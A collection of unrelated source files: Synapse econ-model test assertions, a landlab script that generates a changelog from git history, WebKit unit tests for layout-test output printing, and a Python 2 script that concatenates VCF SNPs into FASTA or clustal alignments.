self.len(1, await core.nodes('econ:purchase:price +:price<=13.37'))
self.len(0, await core.nodes('econ:purchase:price +:price<10.00'))
self.len(0, await core.nodes('econ:purchase:price +:price>20.00'))
self.len(0, await core.nodes('econ:purchase:price +:price>=20.00'))
self.len(0, await core.nodes('econ:purchase:price +:price<=10.00'))
self.eq(bycont, perc.get('by:contact'))
self.eq(fromcont, perc.get('from:contact'))
self.eq(True, perc.get('paid'))
self.eq(1517529600000, perc.get('paid:time'))
self.eq(1517788800000, perc.get('settled'))
self.eq(1517529600000, perc.get('time'))
self.eq(place, perc.get('place'))
self.len(1, await core.nodes('econ:purchase -> geo:place'))
self.len(2, await core.nodes('econ:purchase -> ps:contact | uniq'))
acqu = (await core.nodes(f'[ econ:acquired=({perc.ndef[1]}, (inet:fqdn,vertex.link)) ]'))[0]
self.eq(perc.ndef[1], acqu.get('purchase'))
self.len(1, await core.nodes('econ:acquired:item:form=inet:fqdn'))
self.len(1, await core.nodes('inet:fqdn=vertex.link'))
self.eq(('inet:fqdn', 'vertex.link'), acqu.get('item'))
text = f'''[
econ:acct:payment="*"
:to:contact={bycont}
:to:coinaddr=(btc, 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2)
:from:contact={fromcont}
:from:coinaddr=(btc, 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2)
:from:pay:card={card.ndef[1]}
:amount = 20.30
:currency = usd
:time=20180202
:purchase={perc.ndef[1]}
]'''
await core.nodes(text)
self.len(1, await core.nodes('econ:acct:payment +:time@=(2017,2019) +{-> econ:pay:card +:name="bob smith"}'))
self.len(1, await core.nodes('econ:acct:payment -> econ:purchase'))
self.len(1, await core.nodes('econ:acct:payment -> econ:pay:card'))
self.len(2, await core.nodes('econ:acct:payment -> ps:contact | uniq'))
nodes = await core.nodes('''
[ econ:fin:exchange=(us,nasdaq) :name=nasdaq :currency=usd :org=* ]
''')
self.len(1, nodes)
self.nn(nodes[0].ndef[1])
self.nn(nodes[0].get('org'))
self.eq('usd', nodes[0].get('currency'))
self.eq('nasdaq', nodes[0].get('name'))
nodes = await core.nodes('''
[
econ:fin:security=(us, nasdaq, tsla)
:exchange=(us, nasdaq)
:ticker=nasdaq/tsla
:type=STOCK
:price=9999.00
:time=202002
]
''')
self.len(1, nodes)
self.eq('947183947f2e2c7bdc55264c20670f19', nodes[0].ndef[1])
self.eq('stock', nodes[0].get('type'))
self.eq('nasdaq/tsla', nodes[0].get('ticker'))
self.eq('9999', nodes[0].get('price'))
self.eq(1580515200000, nodes[0].get('time'))
self.len(1, await core.nodes('econ:fin:security -> econ:fin:exchange +:name=nasdaq'))
nodes = await core.nodes('''
[
econ:fin:tick=*
:time=20200202
:security=(us, nasdaq, tsla)
:price=9999.00
]
''')
self.len(1, nodes)
self.eq(1580601600000, nodes[0].get('time'))
self.eq('947183947f2e2c7bdc55264c20670f19', nodes[0].get('security'))
self.eq('9999', nodes[0].get('price'))
nodes = await core.nodes('''
[
econ:fin:bar=*
:ival=(20200202, 20200203)
:security=(us, nasdaq, tsla)
:price:open=9999.00
:price:close=9999.01
:price:high=999999999999.00
:price:low=0.00001
]
''')
self.len(1, nodes)
self.eq((1580601600000, 1580688000000), nodes[0].get('ival'))
self.eq('947183947f2e2c7bdc55264c20670f19', nodes[0].get('security'))
self.eq('9999', nodes[0].get('price:open'))
self.eq('9999.01', nodes[0].get('price:close'))
self.eq('999999999999', nodes[0].get('price:high'))
self.eq('0.00001', nodes[0].get('price:low'))
nodes = await core.nodes('[ econ:acct:payment=* :from:contract=* :to:contract=* :memo="2012 Chateauneuf du Pape" ]')
self.len(1, nodes)
self.eq('2012 Chateauneuf du Pape', nodes[0].get('memo'))
self.nn(nodes[0].get('to:contract'))
self.nn(nodes[0].get('from:contract'))
nodes = await core.nodes('econ:acct:payment :to:contract -> ou:contract')
self.len(1, nodes)
nodes = await core.nodes('econ:acct:payment :from:contract -> ou:contract')
self.len(1, nodes)
nodes = await core.nodes('''
[ econ:acct:balance=*
:time = 20211031
:pay:card = *
:crypto:address = btc/12345
:amount = 123.45
:currency = usd
:delta = 12.00
]''')
self.len(1, nodes)
self.nn(nodes[0].get('pay:card'))
self.eq(nodes[0].get('time'), 1635638400000)
self.eq(nodes[0].get('crypto:address'), ('btc', '12345'))
self.eq(nodes[0].get('amount'), '123.45')
self.eq(nodes[0].get('currency'), 'usd')
self.eq(nodes[0].get('delta'), '12')
|
|
#! /usr/bin/env python
from __future__ import print_function
import os
import re
import subprocess
import sys
from collections import OrderedDict, defaultdict
from pkg_resources import parse_version
import click
import jinja2
import m2r
__version__ = "0.1.1"
CHANGELOG = """
# Change Log
All notable changes to landlab will be documented in this file.
The format is based on [Keep a Changelog](http://keepachangelog.com/)
and this project adheres to [Semantic Versioning](http://semver.org/).
This file was auto-generated using `scripts/make_changelog.py`.
{% for tag, sections in releases.items() %}
## Version {{ tag }}
*(released on {{ release_date[tag] }})*
{% for section, changes in sections.items() %}
### {{section}}
{% for change in changes -%}
* {{ change }}
{% endfor -%}
{% endfor -%}
{% endfor -%}
""".strip()
SECTIONS = ["Added", "Changed", "Deprecated", "Removed", "Fixed", "Security"]
def git_log(start=None, stop="HEAD"):
cmd = [
"git",
"log",
"--first-parent",
"master",
"--merges",
"--topo-order",
# '--pretty=message: %s+author:%an+body: %b'],
# "--pretty=%s [%an]",
"--pretty=%s",
# '--oneline',
]
if start:
cmd.append("{start}..{stop}".format(start=start, stop=stop))
return subprocess.check_output(cmd).strip().decode("utf-8")
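# For example, with start="v1.0" (a hypothetical tag) the command run above is
# roughly: git log --first-parent master --merges --topo-order --pretty=%s v1.0..HEAD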
def git_tag():
return subprocess.check_output(["git", "tag"]).strip().decode("utf-8")
def git_tag_date(tag):
return (
subprocess.check_output(["git", "show", tag, "--pretty=%ci"])
.strip()
.split()[0]
.decode("utf-8")
)
def git_top_level():
return (
subprocess.check_output(["git", "rev-parse", "--show-toplevel"])
.strip()
.decode("utf-8")
)
def releases(ascending=True):
tags = git_tag().splitlines() + ["HEAD"]
if ascending:
return tags
else:
return tags[::-1]
def format_pr_message(message):
    m = re.match(
        r"Merge pull request (?P<pr>#[0-9]+) "
        r"from (?P<branch>[\S]*)"
        r"(?P<postscript>[\s\S]*$)",
        message,
    )
if m:
return "{branch} [{pr}]{postscript}".format(**m.groupdict())
else:
raise ValueError("not a pull request")
def format_changelog_message(message):
    m = re.match(r"(?P<first>\w+)(?P<rest>[\s\S]*)$", message)
word = m.groupdict()["first"]
if word in ("Add", "Fix", "Deprecate"):
return word + "ed" + m.groupdict()["rest"]
elif word in ("Change", "Remove"):
return word + "d" + m.groupdict()["rest"]
else:
return message
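# Illustrative examples (hypothetical commit subjects, not taken from the repo):
#   format_pr_message("Merge pull request #123 from user/fix-typo")
#       -> "user/fix-typo [#123]"
#   format_changelog_message("Add support for hex grids")
#       -> "Added support for hex grids"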
def prettify_message(message):
if message.startswith("Merge branch"):
return None
try:
message = format_pr_message(message)
except ValueError:
message = format_changelog_message(message)
return message
def brief(start=None, stop="HEAD"):
changes = []
for change in git_log(start=start, stop=stop).splitlines():
if change:
message = prettify_message(change)
if message:
changes.append(message)
return changes
def group_changes(changes):
groups = defaultdict(list)
for change in changes:
if change.startswith("Add"):
group = "Added"
elif change.startswith("Deprecate"):
group = "Deprecated"
elif change.startswith("Remove"):
group = "Removed"
elif change.startswith("Fix"):
group = "Fixed"
elif change.startswith("Security"):
group = "Security"
else:
group = "Changed"
groups[group].append(change)
return groups
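# Illustrative example (hypothetical messages); the returned defaultdict is
# shown here as a plain dict:
#   group_changes(["Added hex grids", "Fixed flake8 errors", "Update docs"])
#       -> {"Added": ["Added hex grids"],
#           "Fixed": ["Fixed flake8 errors"],
#           "Changed": ["Update docs"]}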
def render_changelog(format="rst"):
tags = releases(ascending=False)
changes_by_version = defaultdict(list)
release_date = dict()
for start, stop in zip(tags[1:], tags[:-1]):
if stop.startswith("v"):
version = ".".join(parse_version(stop[1:]).base_version.split(".")[:2])
else:
version = stop
changes_by_version[version] += brief(start=start, stop=stop)
release_date[version] = git_tag_date(stop)
changelog = OrderedDict()
for version, changes in changes_by_version.items():
changelog[version] = group_changes(changes)
env = jinja2.Environment(loader=jinja2.DictLoader({"changelog": CHANGELOG}))
contents = env.get_template("changelog").render(
releases=changelog, release_date=release_date
)
if format == "rst":
contents = m2r.convert(contents)
return contents
@click.command()
@click.argument("output", type=click.File("w"), default="-")
@click.option(
"-q",
"--quiet",
is_flag=True,
help=(
"Don't emit non-error messages to stderr. Errors are still emitted, "
"silence those with 2>/dev/null."
),
)
@click.option(
"-v",
"--verbose",
is_flag=True,
help=(
"Also emit messages to stderr about files that were not changed or were "
"ignored due to --exclude=."
),
)
@click.option(
"-f",
"--force",
is_flag=True,
help="Overwrite an existing change log without prompting.",
)
@click.version_option(version=__version__)
@click.option(
"--format",
type=click.Choice(["md", "rst"]),
default="rst",
help="Format to use for the CHANGELOG.",
)
@click.option(
"--batch",
is_flag=True,
help="Run in batch mode.",
)
def main(output, quiet, verbose, format, force, batch):
contents = render_changelog(format=format)
if not batch:
click.echo_via_pager(contents)
path_to_changelog = os.path.join(git_top_level(), "CHANGELOG." + format)
if os.path.isfile(path_to_changelog) and not force:
click.secho(
"{0} exists. Use --force to overwrite".format(path_to_changelog),
fg="red",
err=True,
)
sys.exit(1)
with open(path_to_changelog, "w") as fp:
fp.write(contents)
click.secho("Fresh change log at {0}".format(path_to_changelog), bold=True, err=True)
if __name__ == "__main__":
main(auto_envvar_prefix="CHANGELOG")
|
|
# Copyright (C) 2010, 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit tests for printing.py."""
import StringIO
import optparse
import sys
import time
import unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system import logtesting
from webkitpy.layout_tests import port
from webkitpy.layout_tests.controllers import manager
from webkitpy.layout_tests.models import test_expectations
from webkitpy.layout_tests.models import test_failures
from webkitpy.layout_tests.models import test_results
from webkitpy.layout_tests.views import printing
def get_options(args):
print_options = printing.print_options()
option_parser = optparse.OptionParser(option_list=print_options)
return option_parser.parse_args(args)
class TestUtilityFunctions(unittest.TestCase):
def test_print_options(self):
options, args = get_options([])
self.assertIsNotNone(options)
class FakeRunResults(object):
def __init__(self, total=1, expected=1, unexpected=0, fake_results=None):
fake_results = fake_results or []
self.total = total
self.expected = expected
self.expected_failures = 0
self.unexpected = unexpected
self.expected_skips = 0
self.results_by_name = {}
total_run_time = 0
for result in fake_results:
self.results_by_name[result.shard_name] = result
total_run_time += result.total_run_time
self.run_time = total_run_time + 1
class FakeShard(object):
def __init__(self, shard_name, total_run_time):
self.shard_name = shard_name
self.total_run_time = total_run_time
class Testprinter(unittest.TestCase):
def assertEmpty(self, stream):
self.assertFalse(stream.getvalue())
def assertNotEmpty(self, stream):
self.assertTrue(stream.getvalue())
def assertWritten(self, stream, contents):
self.assertEqual(stream.buflist, contents)
def reset(self, stream):
stream.buflist = []
stream.buf = ''
def get_printer(self, args=None):
args = args or []
printing_options = printing.print_options()
option_parser = optparse.OptionParser(option_list=printing_options)
options, args = option_parser.parse_args(args)
host = MockHost()
self._port = host.port_factory.get('test', options)
nproc = 2
regular_output = StringIO.StringIO()
printer = printing.Printer(self._port, options, regular_output)
return printer, regular_output
def get_result(self, test_name, result_type=test_expectations.PASS, run_time=0):
failures = []
if result_type == test_expectations.TIMEOUT:
failures = [test_failures.FailureTimeout()]
elif result_type == test_expectations.CRASH:
failures = [test_failures.FailureCrash()]
return test_results.TestResult(test_name, failures=failures, test_run_time=run_time)
def test_configure_and_cleanup(self):
# This test verifies that calling cleanup repeatedly and deleting
# the object is safe.
printer, err = self.get_printer()
printer.cleanup()
printer.cleanup()
printer = None
def test_print_config(self):
printer, err = self.get_printer()
        # FIXME: it's lame that I have to set these options directly.
printer._options.pixel_tests = True
printer._options.new_baseline = True
printer._options.time_out_ms = 6000
printer._options.slow_time_out_ms = 12000
printer.print_config('/tmp')
self.assertIn("Using port 'test-mac-mac10.10'", err.getvalue())
self.assertIn('Test configuration: <mac10.10, x86, release>', err.getvalue())
self.assertIn('View the test results at file:///tmp', err.getvalue())
self.assertIn('View the archived results dashboard at file:///tmp', err.getvalue())
self.assertIn('Baseline search path: test-mac-mac10.10 -> test-mac-mac10.11 -> generic', err.getvalue())
self.assertIn('Using Release build', err.getvalue())
self.assertIn('Pixel tests enabled', err.getvalue())
self.assertIn('Command line:', err.getvalue())
self.assertIn('Regular timeout: ', err.getvalue())
self.reset(err)
printer._options.quiet = True
printer.print_config('/tmp')
self.assertNotIn('Baseline search path: test-mac-mac10.10 -> test-mac-mac10.11 -> generic', err.getvalue())
def test_print_directory_timings(self):
printer, err = self.get_printer()
printer._options.debug_rwt_logging = True
run_results = FakeRunResults()
run_results.results_by_name = {
"slowShard": FakeShard("slowShard", 16),
"borderlineShard": FakeShard("borderlineShard", 15),
"fastShard": FakeShard("fastShard", 1),
}
printer._print_directory_timings(run_results)
self.assertWritten(err, ['Time to process slowest subdirectories:\n', ' slowShard took 16.0 seconds to run 1 tests.\n', '\n'])
printer, err = self.get_printer()
printer._options.debug_rwt_logging = True
run_results.results_by_name = {
"borderlineShard": FakeShard("borderlineShard", 15),
"fastShard": FakeShard("fastShard", 1),
}
printer._print_directory_timings(run_results)
self.assertWritten(err, [])
def test_print_one_line_summary(self):
def run_test(total, exp, unexp, shards, result):
printer, err = self.get_printer(['--timing'] if shards else None)
fake_results = FakeRunResults(total, exp, unexp, shards)
total_time = fake_results.run_time + 1
printer._print_one_line_summary(total_time, fake_results)
self.assertWritten(err, result)
# Without times:
run_test(1, 1, 0, [], ["The test ran as expected.\n", "\n"])
run_test(2, 1, 1, [], ["\n", "1 test ran as expected, 1 didn't:\n", "\n"])
run_test(3, 2, 1, [], ["\n", "2 tests ran as expected, 1 didn't:\n", "\n"])
run_test(3, 2, 0, [], ["\n", "2 tests ran as expected (1 didn't run).\n", "\n"])
# With times:
fake_shards = [FakeShard("foo", 1), FakeShard("bar", 2)]
run_test(1, 1, 0, fake_shards, ["The test ran as expected in 5.00s (2.00s in rwt, 1x).\n", "\n"])
run_test(2, 1, 1, fake_shards, ["\n", "1 test ran as expected, 1 didn't in 5.00s (2.00s in rwt, 1x):\n", "\n"])
run_test(3, 2, 1, fake_shards, ["\n", "2 tests ran as expected, 1 didn't in 5.00s (2.00s in rwt, 1x):\n", "\n"])
run_test(3, 2, 0, fake_shards, ["\n", "2 tests ran as expected (1 didn't run) in 5.00s (2.00s in rwt, 1x).\n", "\n"])
def test_test_status_line(self):
printer, _ = self.get_printer()
printer._meter.number_of_columns = lambda: 80
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(80, len(actual))
self.assertEqual(actual, '[0/0] fast/dom/HTMLFormElement/associa...after-index-assertion-fail1.html passed')
printer._meter.number_of_columns = lambda: 89
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(89, len(actual))
self.assertEqual(actual, '[0/0] fast/dom/HTMLFormElement/associated-...ents-after-index-assertion-fail1.html passed')
printer._meter.number_of_columns = lambda: sys.maxint
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(90, len(actual))
self.assertEqual(actual, '[0/0] fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html passed')
printer._meter.number_of_columns = lambda: 18
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(18, len(actual))
self.assertEqual(actual, '[0/0] f...l passed')
printer._meter.number_of_columns = lambda: 10
actual = printer._test_status_line('fast/dom/HTMLFormElement/associated-elements-after-index-assertion-fail1.html', ' passed')
self.assertEqual(actual, '[0/0] associated-elements-after-index-assertion-fail1.html passed')
def test_details(self):
printer, err = self.get_printer(['--details'])
result = self.get_result('passes/image.html')
printer.print_started_test('passes/image.html')
printer.print_finished_test(result, expected=False, exp_str='', got_str='')
self.assertNotEmpty(err)
def test_print_found(self):
printer, err = self.get_printer()
printer.print_found(100, 10, 1, 1)
self.assertWritten(err, ["Found 100 tests; running 10, skipping 90.\n"])
self.reset(err)
printer.print_found(100, 10, 2, 3)
self.assertWritten(err, ["Found 100 tests; running 10 (6 times each: --repeat-each=2 --iterations=3), skipping 90.\n"])
def test_debug_rwt_logging_is_throttled(self):
printer, err = self.get_printer(['--debug-rwt-logging'])
result = self.get_result('passes/image.html')
printer.print_started_test('passes/image.html')
printer.print_finished_test(result, expected=True, exp_str='', got_str='')
printer.print_started_test('passes/text.html')
result = self.get_result('passes/text.html')
printer.print_finished_test(result, expected=True, exp_str='', got_str='')
# Only the first test's start should be printed.
lines = err.buflist
self.assertEqual(len(lines), 1)
self.assertTrue(lines[0].endswith('passes/image.html\n'))
|
|
#!/usr/bin/python
"""
Concatenates all SNPs from a VCF file in either FASTA or aln (clustal) format
"""
import os, sys
import copy
import argparse
import multiprocessing
from pprint import pprint as pp
from collections import defaultdict, Counter
sys.path.insert(0, '.')
import vcfmerger
import editdist
from treemanager import fixsppname
#GZ=SL2.40ch06g50000_000100001_000150000.vcf.gz.raw.vcf.gz; FA=$GZ.SL2.40ch06.fasta; ../vcfconcat.py -f -RIL -Rg -Rd -i $GZ; ../FastTreeMP -fastest -gamma -nt -bionj -boot 100 -log $FA.log -out $FA.tree $FA; ../FastTreeMP -nt -makematrix $FA > $FA.matrix; ./newick_to_png.py --infile $FA.tree
#FA=SL2.40ch06g50000_000100001_000150000.vcf.gz.SL2.40ch06.fasta; ../FastTreeMP -fastest -gamma -nt -bionj -boot 100 -log $FA.log -out $FA.tree $FA; ../FastTreeMP -nt -makematrix $FA > $FA.matrix; ./newick_to_png.py --infile $FA.tree
def main(args):
methods = {
'median' : grouper_median,
'linkage': grouper_linkage
}
dflmethod = methods.keys()[0]
parser = argparse.ArgumentParser(description='Concatenate SNPs as a single sequence for each species.')
parser.add_argument('-c', '--chrom' , '--chromosome', dest='chromosome' , default=None , action='store' , nargs='?', type=str , help='Chromosome to filter [all]')
parser.add_argument('-I', '--ignore', '--skip' , dest='ignore' , default=[] , action='append' , nargs='*', type=str , help='Chromosomes to skip')
parser.add_argument('-s', '--start' , dest='start' , default=None , action='store' , nargs='?', type=int , help='Chromosome start position to filter [0]')
parser.add_argument('-e', '--end' , dest='end' , default=None , action='store' , nargs='?', type=int , help='Chromosome end position to filter [-1]')
parser.add_argument('-t', '--threads' , dest='threads' , default=0 , action='store' , nargs='?', type=int , help='Number of threads [num chromosomes]')
parser.add_argument('-a', '--clustal' , dest='fasta' , action='store_false', help='Output in clustal .aln format [default: fasta format]')
parser.add_argument('-r', '--noref' , dest='noref' , action='store_false', help='Do not print reference [default: true]')
parser.add_argument('-n', '--ref-name' , dest='refname' , default='ref' , action='store' , nargs='?', type=str , help='Reference name [default: ref]')
parser.add_argument('-R', '--RIL' , dest='RIL' , action='store_true' , help='RIL mode: false]')
parser.add_argument('-Rm','--RIL-mads' , dest='RILmads' , default=0.25 , action='store' , nargs='?', type=float, help='RIL percentage of Median Absolute Deviation to use (smaller = more restrictive): 0.25]')
parser.add_argument('-Rs','--RIL-minsim' , dest='RILminsim' , default=0.75 , action='store' , nargs='?', type=float, help='RIL percentage of nucleotides identical to reference to classify as reference: 0.75]')
parser.add_argument('-Rg','--RIL-greedy' , dest='RILgreedy' , action='store_true' , help='RIL greedy convert nucleotides to either the reference sequence or the alternative sequence: false]')
parser.add_argument('-Rd','--RIL-delete' , dest='RILdelete' , action='store_true' , help='RIL delete invalid sequences: false]')
parser.add_argument('-M' ,'--RIL-method' , dest='groupMethod', default=dflmethod, action='store' , nargs='?', choices=methods.keys(), type=str , help='Clustering method for RIL selection of good and bad sequences [' + ','.join(methods.keys()) + ']')
parser.add_argument('-i' , '--input' , dest='input' , default=None , nargs='?', type=str , help='Input file')
#parser.add_argument('input' , default=None , action='store' , nargs='?', metavar='input file', type=str , help='Input file')
options = parser.parse_args(args)
print options
indexFile = None
parallel = False
config = {
'format' : 'fasta',
'ignore' : [],
'inchr' : None,
'inend' : None,
'infhd' : None,
'infile' : None,
'instart' : None,
'noref' : True,
'refname' : None,
'ouchr' : None,
'oufhd' : None,
'RIL' : False,
'RILmads' : 0.25,
'RILminsim' : 0.75,
'RILgreedy' : False,
'RILdelete' : False,
'sppmaxlength' : None,
'threads' : None,
}
config['infile' ] = options.input
config['ignore' ] = options.ignore
config['inchr' ] = options.chromosome
config['inend' ] = options.end
config['instart' ] = options.start
config['noref' ] = options.noref
config['refname' ] = options.refname
config['threads' ] = options.threads
config['RIL' ] = options.RIL
config['RILmads' ] = options.RILmads
config['RILminsim' ] = options.RILminsim
config['RILgreedy' ] = options.RILgreedy
config['RILdelete' ] = options.RILdelete
config['groupMethod'] = options.groupMethod
if config['groupMethod'] not in methods:
print "%s not a valid method" % config['groupMethod']
sys.exit(1)
config[ 'grouper' ] = methods[ config['groupMethod'] ]
if options.input is None:
print "no input file defined"
sys.exit(1)
if not os.path.exists(options.input):
print "input file %s does not exists" % options.input
sys.exit(1)
if not options.fasta:
config['format' ] = 'aln'
if ( config['instart'] is not None ) and ( config['inend'] is not None ):
if config['inend'] <= config['instart']:
print "end position smaller than start position %d < %d" % (config['inend'] < config['instart'])
sys.exit(1)
parallel = False
if ( config['inchr'] is None ) and ( config['instart'] is None ) and ( config['inend'] is None ):
parallel = True
indexFile = config['infile'] + ".idx"
print "Input File : %s" % config['infile']
print "Index File : %s (exists: %s)" % ( indexFile, os.path.exists(indexFile) )
print "Print Reference : %s" % ( str(options.noref) )
if not os.path.exists( indexFile ):
vcfmerger.makeIndexFile( indexFile, config['infile'] )
config['idx'] = vcfmerger.readIndex(indexFile)
if config['inchr'] is not None:
if config['inchr'] not in config['idx']:
print "requested chromosome %s does not exists" % config['inchr']
sys.exit(1)
config['insekpos'] = config['idx'][config['inchr']]
readSources(config)
if parallel:
parallelize(config)
else:
readData(config)
return config
def getOptionInFile(pars, opts):
"""
Returns input file from argument
"""
    infile = opts.input
    if infile is None:
        print "no input file given"
        pars.print_help()
        sys.exit(1)
    if isinstance(infile, list):
        if len(infile) > 1:
            print "more than one file given"
            print infile
            pars.print_help()
            sys.exit(1)
        infile = infile[0]
return infile
def parallelize(config):
"""
Runs in parallel
"""
print "parallelizing"
if config['threads' ] == 0:
config['threads' ] = len( config['idx'] )
print "num threads %d" % config['threads' ]
#config['thread' ] = 1
#sys.exit(0)
pool = multiprocessing.Pool(processes=config['threads' ])
#pool = multiprocessing.Pool(processes=1)
results = []
for chrom, pos in sorted(config['idx'].items(), key=lambda item: item[1]):
config['inchr' ] = chrom
config['insekpos'] = pos
if chrom in config['ignore' ]:
continue
print "parallelizing :: chrom %s" % chrom
results.append( [chrom, pool.apply_async( readData, [ copy.copy( config ) ] )] )
while len(results) > 0:
for info in results:
try:
#print "getting result"
chrom, res = info
res.get( 5 )
results.remove( info )
print "getting result %s. OK" % chrom
except multiprocessing.TimeoutError:
#print "getting result FAILED. waiting"
pass
def readSources(config):
"""
Read list of VCF files
"""
print "reading sources"
print "opening",
with vcfmerger.openvcffile(config['infile'], 'r') as infhd:
print "ok"
print "reading"
header = ""
sources = {}
names = None
for line in infhd:
line = line.strip()
if len(line) == 0: continue
if line[0] == '#':
header += line + "\n"
if line.startswith('##sources='):
names = line[10:].split('|')
for name in names:
sources[name] = []
#pp(sources)
elif line.startswith('##numsources='):
numsources = int(line[13:])
if numsources != len(sources):
print "error parsing sources", numsources, len(sources),sources, len(names), names
sys.exit(1)
else:
print "num sources:",numsources
continue
break
sppmaxlength = 0
for spp in sorted(sources):
sppname = fixsppname( spp )
if len(sppname) > sppmaxlength: sppmaxlength = len(sppname)
sppmaxlength += 2
sppmaxlength = "%-"+str(sppmaxlength)+"s"
config['sppmaxlength'] = sppmaxlength
config['sources' ] = sources
config['names' ] = names
config['header' ] = header
def readData(config):
"""
read data from specific VCF file
"""
print "reading data"
config['infhd'] = vcfmerger.openvcffile(config['infile'], 'r')
config['ouchr'] = None
config['oufhd'] = None
runName = "all"
if config['idx'] is not None:
print "reading data :: has idx"
if config['inchr'] is not None:
print "reading data :: has idx :: seeking chrom %s" % config['inchr']
config['infhd'].seek( config['insekpos'] )
runName = config['inchr']
print "reading data :: has idx :: seeking chrom %s. DONE" % config['inchr']
else:
print "reading data :: has idx :: error seeking"
sys.exit(1)
print "reading data :: %s" % config['inchr']
inchr = config['inchr' ]
instart = config['instart' ]
inend = config['inend' ]
config['coords' ] = set()
refs = []
lastChro = None
numSnps = -1
numSnpsVal = -1
lastPos = -1
lastPosVal = -1
finalChro = False
for line in config['infhd']:
line = line.strip()
if len(line) == 0: continue
if line[0] == '#':
continue
cols = line.split("\t")
if len(cols) != 10:
print line
sys.exit(1)
chro = cols[0]
posi = int(cols[1])
src = cols[3]
dst = cols[4]
spps = cols[9].split("|")
if lastChro != chro:
print chro
if lastChro is not None:
if inchr is not None:
if inchr != lastChro:
print "reading data :: %s :: %s :: skipping exporting" % (runName, lastChro)
lastChro = chro
continue
else:
finalChro = True
parse(config, refs, lastChro)
if finalChro: break
print "reading data :: %s :: %s :: empting" % (runName, lastChro)
refs = []
lastChro = chro
lastPos = -1
numSnps = -1
for spp in config['sources']:
config['sources'][spp] = []
if chro in config['ignore' ]:
continue
if lastPos != posi:
if numSnps % 100000 == 0:
print "reading data :: %s :: %s %12d" % (runName, chro, numSnps)
numSnps += 1
lastPos = posi
if ( inchr is not None ):
if ( inchr != chro ) :
#sys.stdout.write(".")
continue
if ( instart is not None ) and ( posi < instart ):
#sys.stdout.write("<")
#print "%d<%d" % (posi, instart),
continue
if ( inend is not None ) and ( posi > inend ):
#sys.stdout.write(">")
#print "%d>%d" % (posi, instart),
continue
if lastPosVal != posi:
if numSnpsVal % 1000 == 0:
print "reading data :: %s :: %s %12d valid" % (runName, chro, numSnpsVal)
numSnpsVal += 1
for spp in config['sources']:
config['sources'][spp].append(None)
refs.append(src)
lastPosVal = posi
for spp in spps:
config['sources'][spp][numSnps] = dst
config['coords' ].add( posi )
#print '.',
if ( inchr is None ) or ( inchr == lastChro ):
parse(config, refs, lastChro)
if config['oufhd'] is not None:
config['oufhd'].write('\n\n')
config['oufhd'].close()
config['oufhd'] = None
print "reading data :: %s :: finished" % runName
return 0
def parse(config, refs, chro):
"""
Export alignment either in FASTA or ALN (clustal)
"""
print " exporting: chro %s" % chro
sources = config['sources']
names = config['names' ]
for spp in sources:
#print " parsing %s :: %s" % (chro, spp)
poses = sources[spp]
for pos in xrange(len(poses)):
nuc = poses[pos]
if nuc is None:
nuc = refs[pos]
poses[pos] = nuc
sourcesStrs = {}
for spp in names:
sourcesStrs[spp] = "".join( sources[spp] )
refsStrs = "".join( refs )
emptyStr = "N"*len(sourcesStrs[spp])
if config[ 'RIL' ]:
print 'RIL'
refsStrs, sourcesStrs, emptyStr = RIL( config, refsStrs, sourcesStrs, emptyStr )
if config['format'] == 'aln':
for frag in xrange(0, len(refs), 60):
#print frag,
if config['noref' ]:
refsfrag = refsStrs[frag:frag+60]
printfilealn( config, config['refname'], refsfrag, chro )
for spp in sorted( sourcesStrs ):
poses = sourcesStrs[spp]
posesfrag = poses[frag:frag+60]
sppname = fixsppname( spp )
printfilealn( config, sppname, posesfrag, chro )
config['oufhd'].write('\n\n')
elif config['format'] == 'fasta':
for spp in sorted( sourcesStrs ):
sppname = fixsppname( spp )
poses = sourcesStrs[spp]
printfilefasta(config, sppname, poses , chro)
if config['noref' ]:
printfilefasta(config, config['refname'], refsStrs, chro)
printfilecoords(config, chro)
if config['oufhd'] is not None:
config['oufhd'].write('\n\n')
config['oufhd'].close()
config['oufhd'] = None
def RIL( config, refsStrs, sourcesStrs, emptyStr ):
high, low, valids, invalids = config[ 'grouper' ]( config, refsStrs, sourcesStrs, emptyStr )
#valids, invalids = filterSimilarity( valids, invalids, config, refsStrs, sourcesStrs, emptyStr )
refsStrs, sourcesStrs, emptyStr = filter( high, low, valids, invalids, config, refsStrs, sourcesStrs, emptyStr )
return ( refsStrs, sourcesStrs, emptyStr )
def grouper_median( config, refsStrs, sourcesStrs, emptyStr ):
distMatrix = {}
mindist = sys.maxint
